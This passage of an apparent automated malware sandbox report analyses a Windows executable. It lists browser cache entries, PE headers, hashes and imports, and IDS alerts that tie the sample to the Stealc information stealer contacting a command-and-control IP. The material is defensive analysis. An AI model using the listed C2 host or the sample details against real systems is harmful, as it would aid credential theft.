az7b,GwYlN,eVCnO,EIOG1e,LDQI"
Preview:	"use strict";_F_installCss(".VfPpkd-Sx9Kwc .VfPpkd-P5QLlc{background-color:#fff;background-color:var(--mdc-theme-surface,#fff)}.VfPpkd-Sx9Kwc .VfPpkd-IE5DDf,.VfPpkd-Sx9Kwc .VfPpkd-P5QLlc-GGAcbc{background-color:rgba(0,0,0,.32)}.VfPpkd-Sx9Kwc .VfPpkd-k2Wrsb{color:rgba(0,0,0,.87)}.VfPpkd-Sx9Kwc .VfPpkd-cnG4Wd{color:rgba(0,0,0,.6)}.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub{color:#000;color:var(--mdc-theme-on-surface,#000)}.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub .VfPpkd-Bz112c-Jh9lGc::before,.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub .VfPpkd-Bz112c-Jh9lGc::after{background-color:#000;background-color:var(--mdc-ripple-color,var(--mdc-theme-on-surface,#000))}.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub:hover .VfPpkd-Bz112c-Jh9lGc::before,.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub.VfPpkd-ksKsZd-XxIAqe-OWXEXe-ZmdkE .VfPpkd-Bz112c-Jh9lGc::before{opacity:.04;opacity:var(--mdc-ripple-hover-opacity,.04)}.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub.VfPpkd-ksKsZd-mWPk3d-OWXEXe-AHe6Kc-XpnDCe .VfPpkd-Bz112c-Jh9lGc::before,.VfPpkd-Sx9Kwc .VfPpkd-zMU9ub:not(.VfPpkd-ksKsZd-mWPk3d):

Chrome Cache Entry: 471

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	44
Entropy (8bit):	4.453416561671607
Encrypted:	false
SSDEEP:	3:8VKJmQcwVbF7KnZ:BJmjwVbF7KZ
MD5:	491DC96011445194971CFAE6A7A0B191
SHA1:	74BD675A8CBC8AF507C0EB5509727EA3F9B85060
SHA-256:	C3BA6FCBB38A83C87009DEE4BAB93A9B3274553128D77E5B2C04077ECD35C1D3
SHA-512:	38356EF67B6B704F2129828299E516B04B29EA1EEB25CF356E22E3AFEC7A875E2187F70E9E7CF0467DEFA14F11D802ACF00D69B2B13EFEA025942E21383AC35E
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
Preview:	Ch8KBw0ZARP6GgAKCw3oIX6GGgQISxgCCgcN05ioBxoA

Chrome Cache Entry: 472

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (693)
Category:	downloaded
Size (bytes):	3143
Entropy (8bit):	5.395278722976637
Encrypted:	false
SSDEEP:	96:oIgyApevcKKbXi57OPtiPqT8CY+wN84BYvw:Eyw4cFbXi5etCU8Cd884Bx
MD5:	BCA7634907B79815ED2EFE44FB3B61FF
SHA1:	CF4940BF244F15AEF096BBE9FA161F0334ECDFBD
SHA-256:	2EFD21EA0D283FBC11B9B27F59E0262460030B68280C6D27C0ABB104D4478D18
SHA-512:	B0048E654C094B3BE7616BC6BA887F4081A4A4FAF56ED87E327B26303E0205A674BC8FDFD26B0AFCFADA5A08BF17816DE633D6259C132F56001DAE7059028EAB
Malicious:	false
URL:	"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O/ck=boq-identity.AccountsSignInUi.l-wDiRdkD7w.L.B1.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/exm=AvtSve,CMcBD,E87wgc,EFQ78c,EIOG1e,EN3i8d,Fndnac,GwYlN,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MY7mZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZakeSe,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,gJzDyc,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,mzzZzc,n73qwf,njlZCf,oLggrd,pxq3x,qPYxq,qPfo0c,qmdT9,rCcCxc,rmumx,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,vvMGie,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlEj4c2gpALY9d1y-KEtxGydehDcfA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZwDk9d,RMhBfe"
Preview:	"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;.try{._.k("ZwDk9d");.var Bw=function(a){_.J.call(this,a.Fa)};_.B(Bw,_.J);Bw.Ma=_.J.Ma;Bw.Ba=_.J.Ba;Bw.prototype.qO=function(a){return _.De(this,{Xa:{xP:_.Ij}}).then(function(b){var c=window._wjdd,d=window._wjdc;return!c&&d?new _.Bh(function(e){window._wjdc=function(f){d(f);e(NFa(f,b,a))}}):NFa(c,b,a)})};var NFa=function(a,b,c){return(a=a&&a[c])?a:b.Xa.xP.qO(c)};.Bw.prototype.aa=function(a,b){var c=_.qua(b).Qi;if(c.startsWith("$")){var d=_.bm.get(a);_.rq[b]&&(d\|\|(d={},_.bm.set(a,d)),d[c]=_.rq[b],delete _.rq[b],_.sq--);if(d)if(a=d[c])b=_.Ce(a);else throw Error("$b`"+b);else b=null}else b=null;return b};_.er(_.Tea,Bw);._.m();._.k("SNUn3");._.MFa=new _.Pe(_.Kf);._.m();._.k("RMhBfe");.var OFa=function(a,b){a=_.Hsa(a,b);return a.length==0?null:a[0].ctor},PFa=function(){return Object.values(_.op).reduce(function(a,b){return a+Object.keys(b).length},0)},QFa=function(){return Object.entries

Chrome Cache Entry: 473

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (405)
Category:	downloaded
Size (bytes):	1600
Entropy (8bit):	5.22752010187924
Encrypted:	false
SSDEEP:	48:o7MbOMh02nH2AbURSCiyb8pAztxbmzZ7Dujefrw:oSh02HeSCb8uxKTw
MD5:	1F5C70264C0DAF953AAFF6A4D70463C0
SHA1:	C5298B3FD509879B6F730A5F408DB07911AD0991
SHA-256:	D0B6060D0EDD26634F7671824398F8C73BC94EE44FC95FC4E12177BD951D5882
SHA-512:	655A20C8DEC85595EE31532D1FE48491FC7F844378A43109511D7BA8DDAE9CD61D81FB3451033A3B901D3FE3EF4A50E0F7B06F99815A1FCDCC6199989C0134D7
Malicious:	false
URL:	"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O/ck=boq-identity.AccountsSignInUi.l-wDiRdkD7w.L.B1.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/exm=AvtSve,CMcBD,E87wgc,EFQ78c,EIOG1e,EN3i8d,Fndnac,GwYlN,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MY7mZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZakeSe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,bm51tf,byfTOb,cYShmd,eVCnO,f8Gu1e,gJzDyc,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,mzzZzc,n73qwf,njlZCf,oLggrd,pxq3x,qPYxq,qPfo0c,qmdT9,rCcCxc,rmumx,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,vvMGie,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlEj4c2gpALY9d1y-KEtxGydehDcfA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=w9hDv,VwDzFe,A7fCU"
Preview:	"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;.try{._.k("w9hDv");._.Jf(_.Yja);_.zw=function(a){_.J.call(this,a.Fa);this.aa=a.Xa.cache};_.B(_.zw,_.J);_.zw.Ma=_.J.Ma;_.zw.Ba=function(){return{Xa:{cache:_.Dp}}};_.zw.prototype.execute=function(a){_.Ua(a,function(b){var c;_.Be(b)&&(c=b.fb.Yb(b.jb));c&&this.aa.cE(c)},this);return{}};_.er(_.ska,_.zw);._.m();._.k("VwDzFe");.var kF=function(a){_.J.call(this,a.Fa);this.aa=a.Da.hp;this.ea=a.Da.metadata;this.da=a.Da.yr};_.B(kF,_.J);kF.Ma=_.J.Ma;kF.Ba=function(){return{Da:{hp:_.LE,metadata:_.oXa,yr:_.IE}}};kF.prototype.execute=function(a){var b=this;a=this.da.create(a);return _.Ua(a,function(c){var d=b.ea.getType(c.Fd())===2?b.aa.Ub(c):b.aa.aa(c);return _.Uj(c,_.ME)?d.then(function(e){return _.pd(e)}):d},this)};_.er(_.xka,kF);._.m();._.k("sP4Vbe");._.nXa=new _.Pe(_.tka);._.m();._.k("A7fCU");.var QE=function(a){_.J.call(this,a.Fa);this.aa=a.Da.EM};_.B(QE,_.J);QE.Ma=_.J.Ma;QE.Ba=function(){r

Chrome Cache Entry: 474

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1192)
Category:	downloaded
Size (bytes):	94110
Entropy (8bit):	5.539901212338606
Encrypted:	false
SSDEEP:	1536:a3CLQuMIFEQxjSArvgRlT96Tv9VDmvtCp8Q7xsdLwN7woJZSZ:oWRrvgRlT96pVDmvtCd7xsdFoDSZ
MD5:	2DAE47A86AB6E5CF82F856151B515E99
SHA1:	B062C0BED8BAFDA97134F624F696A7ECCDEE7145
SHA-256:	6EE967D1F0614D9D138ED6D8BCB6E4F22D6DA236A2562D21DA859F463FB70348
SHA-512:	5D09752590D1C8516564C1CB91DE734D82F95E25F815FB8C995AAC77C1892E7640E5C7DE12CB99453D30016129D3B8F53B14E1AFFF0152C1323AE588C4C4DEA6
Malicious:	false
URL:	"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O/ck=boq-identity.AccountsSignInUi.l-wDiRdkD7w.L.B1.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/exm=AvtSve,CMcBD,EFQ78c,EIOG1e,EN3i8d,Fndnac,GwYlN,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MY7mZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PrPYRd,Rkm0ef,SCuOPb,STuCOe,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,ZakeSe,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,byfTOb,cYShmd,eVCnO,gJzDyc,hc6Ubd,inNHtf,lsjVmc,lwddkf,m9oV,mvkUhe,mzzZzc,n73qwf,njlZCf,oLggrd,qmdT9,rCcCxc,siKnQd,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,vvMGie,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlEj4c2gpALY9d1y-KEtxGydehDcfA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,SD8Jgb,rmumx,E87wgc,qPYxq,Tbb4sb,pxq3x,f8Gu1e,soHxf,YgOFye,qPfo0c,yRXbo,bTi8wc,ywOR5c,PHUIyb"
Preview:	"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;.try{._.k("ltDFwf");.var bxb=_.y("ltDFwf");var PU=function(a){_.K.call(this,a.Fa);var b=this.ta();this.ub=this.Sa("P1ekSe");this.mb=this.Sa("cQwEuf");this.da=b.getData("progressvalue").number(0);this.ja=b.getData("buffervalue").number(1);this.Ca=b.yb("B6Vhqe");this.Oa=b.yb("juhVM");this.wa=b.yb("D6TUi");this.aa=b.yb("qdulke");this.La=this.da!==0;this.Ka=this.ja!==1;this.Ga=[];this.ea=_.Bs(this).Ub(function(){this.Ga.length&&(this.Ga.forEach(this.E$,this),this.Ga=[]);this.La&&(this.La=!1,this.ub.setStyle("transform","scaleX("+this.da+")"));.this.Ka&&(this.Ka=!1,this.mb.setStyle("transform","scaleX("+this.ja+")"));_.sr(b,"B6Vhqe",this.Ca);_.sr(b,"D6TUi",this.wa);_.sr(b,"juhVM",this.Oa);_.sr(b,"qdulke",this.aa)}).build();this.ea();_.ch&&_.Bs(this).Ub(function(){b.qb("ieri7c")}).Be().build()();_.yA(this.ta().el(),this.Ra.bind(this))};_.B(PU,_.K);PU.Ba=_.K.Ba;.PU.prototype.Ra=function(a

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.0281010030358635
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	250'880 bytes
MD5:	45fd30020c12378c242dc90687edc24c
SHA1:	934cd43ff8bd35e77d7df2cbc3aa5d96b672e4bf
SHA256:	f4a7d43dc4cdf21cc7a58af7c66386cea1616658f15b996691fbb85a7cb06b9d
SHA512:	9122d305c9850ddddf6ce60e03988ddfc60c29ff36d029e17fabbe3d1bc568433f1762e730852d7281021c9464874dee7f6dc5d4293ce5a99f9e4e587bf742f2
SSDEEP:	3072:QLCWSJzpVnjAyfwr2lY+EKv8QKH/se+lhjWDgKe2yhKVtFRX3vPTZY:PjJzbTg22wKHke+WDGyd3v
TLSH:	2234BF6136A0DC31E5D3563489B4C2F2192EBD929A7495CF3B583BFF1E712809A67323
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@g.s... ... ... kpQ ... kpd ... kpP `.. .~i ... ... v.. kpU ... kp` ... kpg ... Rich... ........PE..L...{..d...................

File Icon


Icon Hash:	cd4d3d2e4e054d07

Static PE Info

General

Entrypoint:	0x4020c9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64C8CA7B [Tue Aug 1 09:03:55 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	74a4a02fbd9b245d3cfc1091756049ca

Entrypoint Preview

Instruction
call 00007F5828B87255h
jmp 00007F5828B8387Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F5828B85001h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F5828B83A09h
call 00007F5828B849EFh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F5828B83B24h
test al, 40h
je 00007F5828B839FFh
call 00007F5828B849D4h
mov dword ptr [eax], 00000022h
jmp 00007F5828B839D5h
push ebx
xor ebx, ebx
test al, 01h
je 00007F5828B83A08h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F5828B83A7Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F5828B83A1Eh
call 00007F5828B84B99h
add eax, 20h
cmp esi, eax
je 00007F5828B839FEh
call 00007F5828B84B8Dh
add eax, 40h
cmp esi, eax
jne 00007F5828B839FFh
push dword ptr [ebp+0Ch]
call 00007F5828B87BDBh
pop ecx
test eax, eax
jne 00007F5828B839F9h
push esi
call 00007F5828B87B87h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F5828B83A76h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x258e4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x204c000	0x9a08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2595c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x253b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x21a90	0x21c00	be2fc7ac35f6bcb59adeebdc77044416	False	0.8934100115740741	data	7.816119789832956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x32c0	0x3400	2150c5d624c43ab2640fb4e3f41ac680	False	0.3517878605769231	data	4.946690235835201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x27000	0x2022e8c	0xdc00	0081d65a5891a8773714b72c0df4f32b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xipewav	0x204a000	0x2d3	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gata	0x204b000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x204c000	0x9a08	0x9c00	a68d0465e6e3b7ce6635ce19c0469f42	False	0.4155899439102564	data	4.538290052444989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x2052c98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x2053b40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x20543e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_ICON	0x204c420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.47041577825159914
RT_ICON	0x204c420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.47041577825159914
RT_ICON	0x204d2c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5825812274368231
RT_ICON	0x204d2c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5825812274368231
RT_ICON	0x204db70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.646889400921659
RT_ICON	0x204db70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.646889400921659
RT_ICON	0x204e238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6972543352601156
RT_ICON	0x204e238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6972543352601156
RT_ICON	0x204e7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.3700207468879668
RT_ICON	0x204e7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.3700207468879668
RT_ICON	0x2050d48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.4624765478424015
RT_ICON	0x2050d48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.4624765478424015
RT_ICON	0x2051df0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5405737704918033
RT_ICON	0x2051df0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5405737704918033
RT_ICON	0x2052778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6374113475177305
RT_ICON	0x2052778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6374113475177305
RT_STRING	0x2054be0	0x452	data	Tamil	India	0.45479204339963836
RT_STRING	0x2054be0	0x452	data	Tamil	Sri Lanka	0.45479204339963836
RT_STRING	0x2055038	0x28e	data	Tamil	India	0.481651376146789
RT_STRING	0x2055038	0x28e	data	Tamil	Sri Lanka	0.481651376146789
RT_STRING	0x20552c8	0x73e	data	Tamil	India	0.4261057173678533
RT_STRING	0x20552c8	0x73e	data	Tamil	Sri Lanka	0.4261057173678533
RT_ACCELERATOR	0x2052c58	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x2052c58	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x2054950	0x30	data			0.9375
RT_GROUP_ICON	0x2052be0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x2052be0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_VERSION	0x2054980	0x260	data			0.5361842105263158

Imports

DLL	Import
KERNEL32.dll	SetEndOfFile, LocalCompact, SetEnvironmentVariableW, GetTickCount, CreateNamedPipeW, GetConsoleAliasesA, EnumResourceTypesA, GetConsoleCP, GlobalAlloc, SetFileShortNameW, LoadLibraryW, IsProcessInJob, FatalAppExitW, AssignProcessToJobObject, IsBadCodePtr, ReplaceFileW, GetModuleFileNameW, GetSystemDirectoryA, CreateFileW, GlobalUnlock, CreateJobObjectA, GetLastError, WriteConsoleInputW, VerLanguageNameW, LoadLibraryA, SetConsoleCtrlHandler, AddAtomW, HeapWalk, GetOEMCP, EnumDateFormatsA, GetModuleHandleA, GetProcessShutdownParameters, EnumResourceNamesA, GetFileTime, PeekConsoleInputA, GetDiskFreeSpaceExA, LCMapStringW, HeapSize, FlushFileBuffers, GetStringTypeW, FindVolumeClose, GetProcAddress, HeapCompact, WriteConsoleW, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, MultiByteToWideChar, ReadFile, GetModuleHandleW, ExitProcess, SetFilePointer, HeapCreate, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, Sleep, RtlUnwind, SetStdHandle, IsProcessorFeaturePresent, CloseHandle
USER32.dll	GetMenu, CharUpperBuffW, SetCaretPos, GetMessageExtraInfo, DrawStateW, GetSysColorBrush
GDI32.dll	GetCharWidthI, GetCharABCWidthsI
WINHTTP.dll	WinHttpOpen
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T20:09:02.018560+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:03.889387+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:04.074873+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
